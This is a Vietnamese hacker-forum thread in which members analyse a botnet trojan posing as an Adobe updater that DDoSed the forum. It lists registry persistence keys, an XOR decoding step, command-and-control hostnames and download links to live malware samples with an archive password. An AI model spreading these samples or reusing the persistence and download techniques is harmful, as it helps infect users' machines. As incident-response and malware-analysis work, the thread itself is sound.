Cám ơn LlyKil đã liên lạc và có một số góp ý hữu ích. Sẵn tham gia trả lời chủ đề này anh hồi âm em luôn là obscurity cũng là một biện pháp trong nhiều biện pháp bảo mật. Đi xa hơn nữa, thật và ảo xen lẫn nhau lại càng có tác dụng hơn :). @ piloveyou: thật ra có rất nhiều anh em HVA nhiệt tình góp ý và đã rất năng động trong việc xử lý zombies trong giới hạn họ quản lý. TQN, conmale, PXMMRF, acoustics89.... chỉ là một số người năng động tham gia phân tích và gởi bài chính thức trên diễn đàn nhưng đằng sau đó, có rất nhiều người đã giúp đỡ và hỗ trợ một cách thầm lặng. Đây là điều đáng mừng vì hầu hết chẳng ai chấp nhận những trò phá hoại một cách bỉ ổi và hèn hạ. Báo chí VN thì chỉ cầm chừng và cái gì có lợi thì mới làm. Ai hơi đâu mà đăng báo mãi về một diễn đàn HVA vớ vẩn nào đó bị DDoS? :-) . Chuyện quan trọng là một cơ chế cảnh báo hiểm hoạ malware và DDoS một cách rộng rãi và hữu hiệu (vẫn chưa có).

Phân tích tính chất vài trận DDoS HVA vừa qua.

tmd — GMT

Mặc bằng chung hiểu biết của người dùng Máy tính và Công nghệ ở VN dừng ở mức khởi động máy -> sài; cài soft(bao gồm cờ rắc) -> sài; Hư->gọi IT(IT gì thì không biết) -> sài. Trong khi đó, IT thì có nhiều mức độ chưa được chuẩn hoá về hiểu biết "sàn". Thấy soft không có crack thì cắm đầu ra internet và tìm mọi cách để có crack. Cài soft anti mã độc cũng phải crack đã hẳn tính, có free cũng không sài vì muốn "crack". -> Tiếp tay cho bot net mở rộng ra. Vì lý do chủ quan/khách quan ở trên làm cho mớ zombie ngày càng lan rộng. Coi như đã đáp ứng được điều kiện đủ của tụi đi chơi DDOS. Điều kiện cần là những tay đốt có hệ thống các phương tiện và cách thức phát tán. Chuyện này dân thường không thể làm gì được, phải có các cơ quan chức năng như an ninh gì đó, ISP và cấp quản lý doanh nghiệp các mức độ. Cấp nhà nước không quan tâm, thì cấp ISP phải lo, cấp ISP không lo thì cấp an ninh dịch vụ phải lo, cấp này không lo nữa thì cấp doanh nghiệp phải tự nhận thức, cấp cuối này DEK nhận thức nữa thì cấp người dùng trực tiếp "PC" nên biết là ko crack/sex.... . Mọi chuyện đều có hệ thống lớp lang, mà VN thì lớp lang hệ thống là không có 1 cái nhìn nhận ra hồn nào hết.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Có một khía cạnh đơn giản nhưng quan trọng có lẽ nên đề cập đó là quá trình biến máy con thành zombie của "AcrobatUpdater.exe". Trong suốt quá trình nhiễm này, có hai tiểu đoạn: 1. Tạo ra: C:\Program Files\Adobe\Updater6 [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe 2. Điều chỉnh registry: - Với key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Run ], Value Name: [ Acrobat Reader and Acrobat Manager ], New Value: [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Run ], Value Name: [ Acrobat Reader and Acrobat Manager ], New Value: [ C:\Program Files\Adobe\Updater6\AcrobatUpdater.exe ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], Value Name: [ CURRENT ], New Value: [ 2011-07-20 16:28:52 ] - Với key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Volatile Environment ], Value Name: [ DATA ], New Value: [ 0x5d4c3c3d3f4b572501120204081e0371454349440e5f514c24484d550e13 ] Nếu người dùng chỉ là "standard user" chớ chẳng phải là user với chủ quyền "administrator" thì hai động tác trên không thể xảy ra được. Trên Windows 7 càng khó hơn vì càng không thể "silently" thực thi việc này. Bởi vậy, với tổng cộng gần 100 ngàn IP tấn công HVA mấy ngày vừa qua (số lượng máy con thật sự đằng sau các IP này có lẽ còn nhiều hơn rất nhiều) toàn là những máy con chạy với chủ quyền "Administrator". Đây là sự thật đáng sợ. Cho dùng Windows 7 có bảo mật như thế nào đi chăng nữa mà người dùng sử dụng máy với account có chủ quyền cao nhất thì coi như tính bảo mật của Windows 7 cũng bỏ đi. Vấn đề được đặt ra, tại sao người dùng dễ dàng tải exe từ những nguồn nào đó không phải từ trang chính thức của Adobe? Hãy gác qua chuyện tạo máy con làm zombies để DDoS mà hãy hình dung xem, hàng trăm ngàn máy con bị điều khiển, bị đánh cắp thông tin (có thể có cả những máy có thông tin quan trọng bởi vì trong danh sách IP tấn công HVA có cả những IP thuộc các ban ngành của chính phủ). Liệu đây là chuyện có thể xem nhẹ và làm ngơ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

tmd — GMT

Vụ "administrator" mà anh conmale nói là vấn đề chính ở VN. Đối với các cty như ngân hàng, kiểm toán, chứng khoán đã có nhận thức ở tầm mức nào đó, họ đã đưa chuyện này vào chính sách hoạt động chung. Người dùng ở mức cuối đều không biết đến user mình đang dùng ở mức nào, mọi chuyện đã có bộ phận CNTT lo. Còn đối với các mô hình kinh doanh khác, vấn đề "administrator" tuỳ vào nhận thức của lảnh đạo về CNTT, về tính tự giác nhận thức của cấp quản lý CNTT. Về mặt bằng nhận thức, đa số doanh nghiệp không quan tâm đúng mực về ảnh hưởng của CNTT vào công việc. Họ chỉ cần "plug and play" hay "power on" là xong rồi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

cayaoanh830 — GMT

Theo như sự phân tích ở trên thì các vụ tấn công Ddos đều giả các cuộc lức wed bình thường nhưng dù gì thì máy tính vẫn là máy tính nó không có trí thông minh bằng người chế tạo ra nó được nó cũng chỉ làm theo những dòng code có sẵn. dựa vào sự suy nghĩ trên em nghĩ ra được 1 cách không biết có được không nếu có gì sai xin các bác bỏ qua cho em . dừng chém em tội nghiệp em lắm :) : =>Tại sau chúng ta không phân biệt sự truy cập đó là người hay là máy bằng cách đưa ra các câu hỏi (như 10+5 = ? hoặc đưa ra một từ tiếng anh mất 1 chữ và nghĩa tiếng việt của nó để ta điền vào ...) để người nào muốn truy cập vào một trang bất kì của HVA cũng phải giải nó.

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

cayaoanh830 wrote:

Theo như sự phân tích ở trên thì các vụ tấn công Ddos đều giả các cuộc lức wed bình thường nhưng dù gì thì máy tính vẫn là máy tính nó không có trí thông minh bằng người chế tạo ra nó được nó cũng chỉ làm theo những dòng code có sẵn. dựa vào sự suy nghĩ trên em nghĩ ra được 1 cách không biết có được không nếu có gì sai xin các bác bỏ qua cho em . dừng chém em tội nghiệp em lắm :) : =>Tại sau chúng ta không phân biệt sự truy cập đó là người hay là máy bằng cách đưa ra các câu hỏi (như 10+5 = ? hoặc đưa ra một từ tiếng anh mất 1 chữ và nghĩa tiếng việt của nó để ta điền vào ...) để người nào muốn truy cập vào một trang bất kì của HVA cũng phải giải nó.

Đến lúc đống zombie đó kết nối được đến tầng này thì chắc server nào bị dội cũng sụm bà chè rồi. Hehe Em vừa vọc vài thứ trong máy, có lòi ra mấy URL (via whireshark):

http://tongfeirou.dyndns-web.com/banner1.png?cpn= (404) https://biouzhen.dyndns-server.com/banner1.png?cpn= USERNAME> (403 nginx)

với User-Agent đều là:

Gozilla_2/General (??)

Đang tiếp tục vọc tiếp ...

Phân tích tính chất vài trận DDoS HVA vừa qua.

cayaoanh830 — GMT

Các bác phân tích con "AcrobatUpdater.exe" bằng chương trình gì vậy?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Bằng các công cụ đã post ở đây: /hvaonline/posts/list/2865.html Giữa 1 rừng malware của STL, em giờ rối luôn, không biết tiếp tục với thằng nào cho xong được khoãng 80-90% ? Hiện tại, cả em và anh conmale đều chưa xác định được thằng nằm vùng nào đã download images01.gif về rồi xor toàn bộ file content với 0x19 để cho ra AcrobatUpdater.exe. Theo lời cao thủ trẻ tuổi acoustics89 (tiết lộ luôn, chứ cứ phải viết cao thủ trẻ tuổi giấu mặt thì mệt quá) thì GoogleCrashHandler.exe down nó về. Nhưng GoogleCrashHandler.exe thì có lẽ mấy cái AV gặp là nó nhai xương rồi. Vậy ai download AcrobatUpdater.exe về, GoogleCrashHandler.exe hay còn 1 thằng .exe/.dll/.xxx giấu mặt nào khác mà anh em ta chưa biết. Nếu còn chưa xác định được thằng nằm vùng này, chúng ta còn phải chạy theo STL dài dài :-( Có vài tool free, nhỏ gọn, không cần install, tụi mạn phép đề nghị anh em khách, thành viên HVA nào không có Wireshark nên down về kiểm tra máy mình: 1. CurrPorts:http://www.nirsoft.net/utils/cports.html 2. SmartSniff: http://www.nirsoft.net/utils/smsniff.html Down và extract ra, run 1 trong 2, đóng mọi kết nối Internet không cần thiết như Chat, Browser. Quan sát xem process nào connect tới tienve.org, port 80. Process đó chính là bot. Xem Process nào connect tới penop.net hoặc bất cứ host lạ nào: thằng này là thằng nằm vùng.

Phân tích tính chất vài trận DDoS HVA vừa qua.

tanviet12 — GMT

Nếu người dùng chỉ là "standard user" chớ chẳng phải là user với chủ quyền "administrator" thì hai động tác trên không thể xảy ra được. Trên Windows 7 càng khó hơn vì càng không thể "silently" thực thi việc này. Bởi vậy, với tổng cộng gần 100 ngàn IP tấn công HVA mấy ngày vừa qua (số lượng máy con thật sự đằng sau các IP này có lẽ còn nhiều hơn rất nhiều) toàn là những máy con chạy với chủ quyền "Administrator". Đây là sự thật đáng sợ. Cho dùng Windows 7 có bảo mật như thế nào đi chăng nữa mà người dùng sử dụng máy với account có chủ quyền cao nhất thì coi như tính bảo mật của Windows 7 cũng bỏ đi.

Hix, ngày xưa em cũng từng cài rất nhiều máy windows. Toàn cho người dùng với quyền administrator, bởi không bị giới hạn trong cài đặt phần mềm... Nhưng lâu rồi thì mới biết, những mấy như thế rất dễ bị virus, "mèo què" gây hại, bởi hiểu một cách đơn giản: dễ với mình thì cũng dễ với mã độc. Bởi vậy, nếu có cách anh chị nào hay cài đặt PC cho bạn bè, người thân, máy tính của công ty mình. Lưu ý nên cài với user bình thường, tạo các policy để giới hạn quyền... Phòng bênh trước khi chữa bệnh!

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

lequi wrote:

Em vừa vọc vài thứ trong máy, có lòi ra mấy URL (via whireshark):
http://tongfeirou.dyndns-web.com/banner1.png?cpn= (404) https://biouzhen.dyndns-server.com/banner1.png?cpn= USERNAME> (403 nginx)
với User-Agent đều là:
Gozilla_2/General (??)
Đang tiếp tục vọc tiếp ...

1- Bạn lequi, tôi đã có đủ thông tin về 2 website (dynamic domain system) này rồi. Nhưng đề nghị bạn cung cấp thêm các thông tin cần thiết sau đây: - Tên Service, process trong hệ thống kích hoạt các kết nối Internet (Internet connection) đến các URL nói trên? (Có phải Service Name là wuauservcom và process là wuauclt.exe hay không? Cũng có nghĩa là trong C\ProgramFiles\Common Files của máy bạn có xuất hiện một folder mới (bình thường không có) tên là "Windows Update Components", trong folder này có các file: wuauclt.exe, wuauserv.dll và UsrClass.ini hay không? Chú ý là nôi dung trong UsrClass.ini được XOR-encrypted, ghi đia chỉ của master website. Trong trường hơp của ban, chúng phải là http://tongfeirou.dyndns-web.com và http://biouzhen.dyndns-server.com. Có đúng như vậy không? Các file wuauclt.exe, wuauserv.dll cũng còn phải nằm ở C\WINDOWS\system32\setup nữa. ) - Chúng là các process riêng biệt hay chỉ một process kích hoạt kết nối đến cả hai URL nói trên? - Có service, process nào kích hoạt kết nối liên tục đến hvaonline.net hay tienve.org không? (tức là service này đang DDoS đến HVA) 2- Ngoài Acrobatupdater.exe, các bạn cũng cần kiểm tra sự hiện diện của các service process sau: - AdobeUpdateManager.exe - jucheck.exe (process giả update Java) - OSA.exe Chúng nằm ở các directories sau: Program Files\Adobe\AdobeUpdateManager.exe Program Files\Java\jre6\bin\jucheck.exe Program Files\Microsoft Office\Office11\OSA.exe Chúng cũng là thành phần của Trojan-bot đấy 3- Có bạn nào có mẫu của Trojan-Bot đang tấn công HVA xin gửi cho tôi để tôi kiểm tra. Chắc chắn sẽ có nhiều thông tin hữu ích. Cả chiều hôm nay bật máy, hạ firewall, disable các antivirus, truy cập đến nhiều website cho là nguy hiểm, mà không kiếm đươc con nào cả Thank you in advance.

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

@PXMMRF: Em sẽ kiểm tra các thông tin anh cần, và có 1 vài lưu ý là các thông tin e để trên đều liên quan đến DNS của Google, vì các thông tin trên tổng hợp trong quá trình bắt các packet gửi qua IP 8.8.8.8 (ngày mai em sẽ dump và gửi cho a vài chi tiết). Hôm nay em cũng có dạo qua các site, và down bộ unikey từ link: http://nethoabinh.com/showthread.php?t=315 Quét file này trên virustotal: http://www.virustotal.com/file-scan/report.html?id=02b3b347ff00c8bdcad7e4c557a41f36e4af110658aea57557fab2c0bd641b1e-1311508169

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

lequi wrote:

@PXMMRF: Em sẽ kiểm tra các thông tin anh cần, và có 1 vài lưu ý là các thông tin e để trên đều liên quan đến DNS của Google, vì các thông tin trên tổng hợp trong quá trình bắt các packet gửi qua IP 8.8.8.8 (ngày mai em sẽ dump và gửi cho a vài chi tiết). Hôm nay em cũng có dạo qua các site, và down bộ unikey từ link: http://nethoabinh.com/showthread.php?t=315 Quét file này trên virustotal: http://www.virustotal.com/file-scan/report.html?id=02b3b347ff00c8bdcad7e4c557a41f36e4af110658aea57557fab2c0bd641b1e-1311508169

OK! Cám ơn ban lequi. File UnikeySetup này có virus-trojan đấy, dù rằng một số Antivirus nổi tiếng như McAfee Antivirus Enterprise (newest version- up to date) không phát hiện ra Tôi sẽ ngâm cứu nó. Ngoài ra xin ban gửi Cache file của whireshark liên quan, cached từ máy của bạn vừa qua Again thank you!

Phân tích tính chất vài trận DDoS HVA vừa qua.

Nesbit — GMT

Xin lỗi mọi người, cho em xen ngang một tí.

conmale wrote:

Vấn đề được đặt ra, tại sao người dùng dễ dàng tải exe từ những nguồn nào đó không phải từ trang chính thức của Adobe?

Nếu STL thâm nhập trang web của Adobe và thay file trên đó bằng file của nó liệu có được không anh? Đó là một giả thiết thôi :P, coi bộ không khả thi (nhưng với trang web của Unikey thì chắc là có thể anh nhỉ, trang đó lâu lắm rồi không update. Em nhắc tới Unikey vì thấy trong các topic của anh TQN).

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Dạo qua một vòng thì thấy số lượng các link cho phép tải unikey và vietkey từ những trang upload miễn phí (như megaupload) nhiều vô kể. Thử download vài cái xuống kiểm nghiệm thì 10/10 là malware :(. Có những diễn đàn chính admin của diễn đàn ấy quảng bá và phát tán những malware này (có chủ ý hoặc vô tình vì không biết). Đúng là một bức tranh xám xịt.

Phân tích tính chất vài trận DDoS HVA vừa qua.

asaxin — GMT

Chào mọi người, theo phân tích của anh conmale thì mình biết chắc chắn máy mình đã bị dính virus của STL.

Sau khi mình xoá Acrobatupdate.exe và xoá hết registry và dùng chương trình Avira thì Avira phát hiện ra trojan trong hình dưới và Acrobatupdate không chạy nữa. Nếu mình tắt chương trình Avira đi thì nó lại chạy trở lại.

Mình có thể cung cấp những gì cho diễn đàn để diệt con virut này.

Phân tích tính chất vài trận DDoS HVA vừa qua.

nobitapm — GMT

PXMMRF wrote:

2- Ngoài Acrobatupdater.exe, các bạn cũng cần kiểm tra sự hiện diện của các service process sau: - AdobeUpdateManager.exe - jucheck.exe (process giả update Java) - OSA.exe Chúng nằm ở các directories sau: Program Files\Adobe\AdobeUpdateManager.exe Program Files\Java\jre6\bin\jucheck.exe Program Files\Microsoft Office\Office11\OSA.exe Chúng cũng là thành phần của Trojan-bot đấy 3- Có bạn nào có mẫu của Trojan-Bot đang tấn công HVA xin gửi cho tôi để tôi kiểm tra. Chắc chắn sẽ có nhiều thông tin hữu ích. Cả chiều hôm nay bật máy, hạ firewall, disable các antivirus, truy cập đến nhiều website cho là nguy hiểm, mà không kiếm đươc con nào cả Thank you in advance.

E kiểm tra máy e thấy có file jucheck.exe tại thư mục như trên. Gửi anh PXMMRF mẫu file jucheck.exe Code:

http://www.mediafire.com/?wpbh40voy00k87w

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

asaxin wrote:

Chào mọi người, theo phân tích của anh conmale thì mình biết chắc chắn máy mình đã bị dính virus của STL.

Sau khi mình xoá Acrobatupdate.exe và xoá hết registry và dùng chương trình Avira thì Avira phát hiện ra trojan trong hình dưới và Acrobatupdate không chạy nữa. Nếu mình tắt chương trình Avira đi thì nó lại chạy trở lại.

Mình có thể cung cấp những gì cho diễn đàn để diệt con virut này.

Khởi động lại Windows ở chế độ safe mode hoặc boot vào bằng Hiren cd rồi xoá hết nội dung trong c:\windows\tmp và c:\windows\temp

Phân tích tính chất vài trận DDoS HVA vừa qua.

asaxin — GMT

Cảm ơn anh conmale. @all: đây là link Acrobatupdate: http://www.mediafire.com/?cqaybxjc88g4riq @bolzano_1989: mình đã gửi email cho bạn. đây link download: http://www.mediafire.com/?o9nwgu69x7tde22 pasword extract: malware

Phân tích tính chất vài trận DDoS HVA vừa qua.

tv_X — GMT

Ồ! Kiểm tra các bộ gõ vietkey2007 mà mình thường dùng và thường cài cho mọi người khi check trên http://www.virustotal.com thì dính dày đặc trojan và backdoor đầy là 2 chương trình vietkey 2007 tiêu biểu: http://www.virustotal.com/file-scan/report.html?id=438175b61d7f81c99b11a6c2e6ba20b98340f3a308731b889ad4bd1c2a34b939-1311091197 http://www.virustotal.com/file-scan/report.html?id=9495bd9f8fd9b0421615baeafd52e81a5c63e4003215a7c23bf5d97e59807d5d-1308413546 Vậy mà Avira, câp nhật hàng ngày không phát hiện được khiếp thế, remove khẩn cấp!

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Trước khi bạn asaxin xoá các file trong c:\windows\tmp và c:\windows\temp, xin bạn tạm thời tắt Avira rồi nén lại các thư mục này và gửi mình qua địa chỉ email sau để CMC Antivirus được cập nhật:

Xin cảm ơn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

TQN wrote:

Chết là chết trong thời gian ngắn đó đấy anh PXM. Tụi nó sẽ cập nhật bot mới lập tức, setup URL download mới lập tức, hy sinh AcrobatUpdater và các URL cũ. Mình sẽ vẫn bị đánh tiếp. File config mới xc.jpg đã không ra lệnh tắt DDOS vào HVA, mà chỉ thay = dòng trêu chọc đó. Một lượng Bot lớn còn lại vẫn theo config cũ mà dập vào HVA ta. Đúng là nhức đầu. Giờ ta có dập được cái host direct.aliasx.net thì vẫn bị DDOS, chỉ còn nước tận diệt các bot còn tồn tại và nhanh chóng tìm ra bot mới. Nếu ISP can thiệp, tui nghĩ họ nên firewall 2 host penop.net và direct.aliasx.net. Bà con nào phát hiện AcrobatUpdater.exe mình và biết cách dùng Wireshark, CommView, TCPView hay SmartSniff (của Nirosoft) có thể giúp mọi người bằng cách: đừng xoá AcrobatUpdater.exe theo dõi thử AcrobatUpdater.exe connect tới host nào, URL ra sao, UserAgent như thế nào ?

Từ hôm qua đến giờ, mỗi lần em bật máy lên là liên tục mỗi phút, máy em tự động check và download (nếu có thể) các file từ các địa chỉ mà anh đã gửi ở trên cùng 2 địa chỉ khác ở các host của STL mà em có. Anh chị em nếu phát hiện các địa chỉ file khác mà virus của đám STL tải về có thể gửi cho em qua tin nhắn riêng để em cùng theo dõi phụ. Ngặt nỗi, em không có máy online 24/24 để theo dõi liên tục mọi lúc đám virus STL này.

Phân tích tính chất vài trận DDoS HVA vừa qua.

rookey — GMT

Xin chào mọi người, em theo dõi topic này ngay từ đầu cũng như các topic mà anh TQN đề cập tới STL. Việc đọc các kỹ thuật phân tích các mẫu virus và cách hoạt động của nó khiến em rất thích tham gia, rất tò mò vì em cũng là it (học năm 3).Mấy anh phân tích rùi post lên cho tất cả mọi người xem và tham gia.Nhưng em chắc có nhiều người như em muốn cùng phân tích và tham gia vào thảo luận chủ đề nhưng kiến thức mà REC mấy mẫu đó thì không có mà chỉ bít đọc code thôi. Nay em có ý kiến này : trong quá mấy anh RCE mấy mẫu virus đó thì tốn rất nhiều thời gian mà không được đồng lương nào mà vì nền it nước nhà, chống lại kể xấu phá hoại và giúp mọi người phòng tránh thì nhờ máy anh chi thêm tí thời gian gõ lại cách RCE, các tools đã sử dụng,những vấn đề gặp phải khi RCE và cách xử lý để thành công, xem đó là một tài liệu quí giá rồi đưa lên diễn đàn kết quả cũng như file tài liệu đó cho mọi người tham khảo học hỏi.Việc đó coi như đàn anh dạy lại cho đàn em, chúng ta cùng hiểu biếu hơn. Ý em nêu như trên mấy anh thấy thế nào ạ. Những gì em nói đầu là mong muốn thật lòng của em nếu có gì không hợp lệ thì mấy anh bỏ qua. Cám ơn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Khoan khoan asaxin ! Cảm ơn cậu, đã chụp được rồi. Cậu up luôn mấy cái file .msi trong thư mục Temp đó luôn. Vấn đề quan trọng nhất bây giờ là xem thằng nào sinh ra mấy cái file .msi đó (.exe giả đuôi .msi: Microsoft Installer). Tạm tắt Avira đi, run FileMon hay ProcMon của SysInternal lên, xem thằng process nào sinh ra mấy cái giả danh đó. Up thằng exe đó lên, và up luôn hình các dll mà thằng process đó dùng luôn. Thằng đó là thằng nằm vùng đấy, chính nó down AcrobatUpdater.exe về để bot ! Gấp, khẩn cấp, làm ngay, anh em đang chờ thộp cổ thằng nằm vùng giấu mặt này ! Wireshark không hiển thì process connect được, cậu asaxin down ngay TCPView (SysInternals) hay CurrPorts, SmartSniff của NirSoft: http://www.nirsoft.net về.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

TQN wrote:

Khoan khoan asaxin ! Cảm ơn cậu, đã chụp được rồi. Cậu up luôn mấy cái file .msi trong thư mục Temp đó luôn. Vấn đề quan trọng nhất bây giờ là xem thằng nào sinh ra mấy cái file .msi đó (.exe giả đuôi .msi: Microsoft Installer). Tạm tắt Avira đi, run FileMon hay ProcMon của SysInternal lên, xem thằng process nào sinh ra mấy cái giả danh đó. Up thằng exe đó lên, và up luôn hình các dll mà thằng process đó dùng luôn. Thằng đó là thằng nằm vùng đấy, chính nó down AcrobatUpdater.exe về để bot ! Gấp, khẩn cấp, làm ngay, anh em đang chờ thộp cổ thằng nằm vùng giấu mặt này ! Wireshark không hiển thì process connect được, cậu asaxin down ngay TCPView (SysInternals) hay CurrPorts, SmartSniff của NirSoft: http://www.nirsoft.net về.

Hì hì, anh bậy thiệt. Sáng giờ lung tung công việc nên anh trả lời asaxin theo quán tính mà quên bà nó chuyện kêu asaxin lưu lại mấy miếng rác đó. Hy vọng asaxin chưa xoá nó :( .

Phân tích tính chất vài trận DDoS HVA vừa qua.

thegunner2401 — GMT

Sao hiện tại E vào internet (bằng cả Chrome và FireFox), nhất là vào HVAonline Check CurPorts đều thấy kết nối đến thutin.tienve.org:80 mà thằng Process là Trình duyệt? E nên làm thế nào bây h? (Newbie nên ko biết gì, các A thông cảm).:(

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Nếu bạn asaxin gặp khó khăn trong việc dùng Process Monitor, bạn có thể gửi boot log với Process Monitor, mình sẽ xem và hướng dẫn chi tiết cho bạn. Hướng dẫn scan và gửi boot log với Process Monitor http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-boot-log-v7899i-process-monitor/

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

thegunner2401 wrote:

Sao hiện tại E vào internet (bằng cả Chrome và FireFox), nhất là vào HVAonline Check CurPorts đều thấy kết nối đến thutin.tienve.org:80 mà thằng Process là Trình duyệt? E nên làm thế nào bây h? (Newbie nên ko biết gì, các A thông cảm).:(

thutin.tienve.org và www.hvaonline.net chạy trên cùng 1 IP cho nên đây là chuyện bình thường, chẳng có gì phải ngại hết.

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

nobitapm wrote:

PXMMRF wrote:

2- Ngoài Acrobatupdater.exe, các bạn cũng cần kiểm tra sự hiện diện của các service process sau: - AdobeUpdateManager.exe - jucheck.exe (process giả update Java) - OSA.exe Chúng nằm ở các directories sau: Program Files\Adobe\AdobeUpdateManager.exe Program Files\Java\jre6\bin\jucheck.exe Program Files\Microsoft Office\Office11\OSA.exe Chúng cũng là thành phần của Trojan-bot đấy 3- Có bạn nào có mẫu của Trojan-Bot đang tấn công HVA xin gửi cho tôi để tôi kiểm tra. Chắc chắn sẽ có nhiều thông tin hữu ích. Cả chiều hôm nay bật máy, hạ firewall, disable các antivirus, truy cập đến nhiều website cho là nguy hiểm, mà không kiếm đươc con nào cả Thank you in advance.
E kiểm tra máy e thấy có file jucheck.exe tại thư mục như trên. Gửi anh PXMMRF mẫu file jucheck.exe Code:
http://www.mediafire.com/?wpbh40voy00k87w

Mẫu này không phải virus, bạn yên tâm nhé

Phân tích tính chất vài trận DDoS HVA vừa qua.

wỷnhỏ — GMT

:(....hjx.tình hình dạo này nhiều máy nhiễm virus of bọn STL quá mấy a nhỉ e cứ download linh tinh mà k bít có nhiễm cái gì k vì kaspersky bản quyền nhà e e quét mà chẳng thấy báo gì mà bác TQL đóng góp nhiều như vậy mà sao mấy bác Admin k cho bác TQL lên MOD hay Smod ạ??? ai cũng nhiệt tình và tốt như mấy bác thì hay biết mấy.....e thì gà quá :((:((:((

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Không sao đâu quỷ nhỏ, anh còn đề nghị anh conmale cho anh xuống member bình thường kìa. Nâng cấp cho anh thì có trả lương được cho anh không ? Chỉ cần ai đó gởi anh vài thùng để uống lai rai trong lúc RCE đám "mèo què" của STL thôi ! Sáng giờ lang thang An Sương, QL 1, xa lộ Hà nội, thấy buồn: kinh tế VN ta năm nay khó khăn quá, nhiều công ty, cửa hàng dẹp tiệm, trả mặt bằng, làm ăn khó khăn, lạm phát tăng cao, lãi suất NH tăng, đứng hết. Anh PXM cũng bên SX-KD, có đồng ý với em là năm nay tình hình vậy không ? Vậy mà đám bán nước, tay sai ngoại bang như STL còn "quậy" lên nữa ! Bây giờ chỉ ngồi chờ asaxin chụp được thằng nằm vùng giấu mặt và up lên để anh em ta chặn hết đường DDOS của tụi nó ! 2 Nobitapm: file jucheck.exe đó của em là file sạch, chính hãng Sun, bảo hành đàng hoàng. Máy em install Win7 64bit à ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

@asaxin: về file Acrobatupdate: mẫu bạn đưa đúng là mẫu của STL mà anh em đang bàn đến, nhưng tiếc là bây giờ, mẫu naỳ cũng không còn giá trị vì STL không còn update file cấu hình nữa Mình đã check thư mục temp của bạn, không còn file nào khác là virus. Bạn theo hướng dẫn của anh conmale mà xoá hết các key registry, xoá file của nó là được

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Ặc ặc, acoustics90 lại xúi bậy rồi. Chờ asaxin up lên thằng nào down AcrobeUpdater.exe về chứ. Phải có thằng down về thì mới có AcrobatUpdater.exe chứ. Không lẽ nó tự sinh ra à ! Vấn đề anh đang suy nghĩ và tìm kiếm chính là thằng giấu mặt này nè ! Có lẽ nó không thể là GoogleCrashHandler hay wcsntfy.* hay bất cứ gì. Nó là thằng giấu mặt từ trước giờ mà ta không biết. Kịch bản của nó như vầy nè: Định kỳ kiểm tra một website nào đó và chắc chắn website này ta chưa biết, download 1 file cấu hình về, parse, parse xong lại down con bot (mạo danh AcrobatUpdater) về. Down AcrobatUpdater về, extract vào thư mục temp, lấy đuôi là .msi, name thì GetTempName, copy vào %Program Files% thành AcrobatUpdater.exe, ShellExecute hay CreateProcessA/W nó, rồi xoá file .msi mạo danh đi. Em nói đúng không mấy thằng "Sống chết theo lệnh", nói sai thì em xin ngừng uống bia lon 1 ngày (bà xã em cũng mừng luôn !!!???). Chính vì vậy mà đống file trong Temp của asaxin đã up lên chả có file .msi nào cả. Xoá mẹ nó hết rồi mà ! Mấy anh là coder, em cũng từng là coder, mấy anh nghĩ gì thì em cũng nghĩ như vậy !

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

lequi wrote:

@PXMMRF: Em sẽ kiểm tra các thông tin anh cần, và có 1 vài lưu ý là các thông tin e để trên đều liên quan đến DNS của Google, vì các thông tin trên tổng hợp trong quá trình bắt các packet gửi qua IP 8.8.8.8 (ngày mai em sẽ dump và gửi cho a vài chi tiết). Hôm nay em cũng có dạo qua các site, và down bộ unikey từ link: http://nethoabinh.com/showthread.php?t=315 Quét file này trên virustotal: http://www.virustotal.com/file-scan/report.html?id=02b3b347ff00c8bdcad7e4c557a41f36e4af110658aea57557fab2c0bd641b1e-1311508169

Mình vừa check bộ Unikey setup này , cho đến giờ phút post bài này, file đó là file sạch. Bạn yên tâm nhé

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

TQN wrote:

Ặc ặc, acoustics90 lại xúi bậy rồi. Chờ asaxin up lên thằng nào down AcrobeUpdater.exe về chứ. Phải có thằng down về thì mới có AcrobatUpdater.exe. Vấn đề anh đang suy nghĩ và tìm kiếm chính là thằng giấu mặt này nè !

Uh. em quên béng mất. Không hiểu thằng nào là thằng đầu tiên tải cái này nhỉ, theo em biết thì Jucheck tải về, nhưng có thể nó đi theo đường khác lắm.

Phân tích tính chất vài trận DDoS HVA vừa qua.

nobitapm — GMT

acoustics89 wrote:

nobitapm wrote:
E kiểm tra máy e thấy có file jucheck.exe tại thư mục như trên. Gửi anh PXMMRF mẫu file jucheck.exe Code:
http://www.mediafire.com/?wpbh40voy00k87w
Mẫu này không phải virus, bạn yên tâm nhé

Thanks bạn acoustic89. -:|-

TQN wrote:

